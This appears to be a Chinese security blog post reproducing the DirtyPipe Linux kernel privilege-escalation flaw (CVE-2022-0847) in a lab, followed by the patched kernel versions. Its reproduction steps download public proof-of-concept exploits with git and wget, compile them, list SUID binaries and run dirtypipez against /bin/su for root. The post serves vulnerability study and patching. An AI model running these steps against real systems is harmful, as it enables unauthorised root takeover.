0x00 前言
0x01 漏洞检测
0x02 环境搭建
建议在搭建环境前,先打好快照
-
Ubuntu 16.04 或 18.04(推荐) -
Python >= 3.6 (不支持Python 2.x!) -
pip3
git clone https://github.com/brant-ruan/metarget.git
cd metarget/
pip3 install -r requirements.txt
sudo ./metarget cnv install cve-2022-0847
环境搭建好后,查看当前系统内核 uname -r
可以看到系统内核已经是 5.8 的了,说明是可能受到该漏洞的影响了。 0x02 漏洞复现
方法一:CVE-2022-0847-DirtyPipe-Exploit
把 POC git 下来 git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit
cd CVE-2022-0847-DirtyPipe-Exploit
开始提权 gcc exploit.c -o exploit
./exploit
我这里提示 su: must be run from a terminal,没提权成功。 根据作者的解释,他的电脑快没电了,所以暂时还没时间解决这个问题,这 …… 方法二:dirtypipez.c
后来看 p 牛说到了网上的其他 POC,下面这个 POC 测试了一下,是可以提权的 mkdir dirtypipez
cd dirtypipez
wget https://haxx.in/files/dirtypipez.c
gcc dirtypipez.c -o dirtypipez
这个 POC 需要事先找到一个具有 SUID 权限的可执行文件,然后利用这个文件进行提权 使用以下命令可以找到这类文件 find / -perm -u=s -type f 2>/dev/null
这里就以 /bin/su 为例了,直接 ./dirtypipez 跟上具有 SUID 权限的文件即可提权 ./dirtypipez /bin/su
0x03 漏洞修复
更新升级 Linux 内核到以下安全版本:
-
Linux 内核 >= 5.16.11 -
Linux 内核 >= 5.15.25 -
Linux 内核 >= 5.10.102
原文链接: https://teamssix.com/220308-120008.html 参考文章: https://t.zsxq.com/imaqj2V https://mp.weixin.qq.com/s/b8DmtIerXuoC7f3nqaOVIw https://access.redhat.com/security/cve/cve-2022-0847
原文始发于微信公众号(TeamsSix):漏洞复现 | DirtyPipe CVE-2022-0847 Linux 内核提权漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论